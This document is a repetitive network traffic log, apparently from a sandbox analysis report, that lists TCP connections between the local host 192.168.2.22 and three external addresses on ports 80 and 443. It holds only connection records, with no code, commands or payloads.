Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.95.60.75:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.95.60.75:80
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
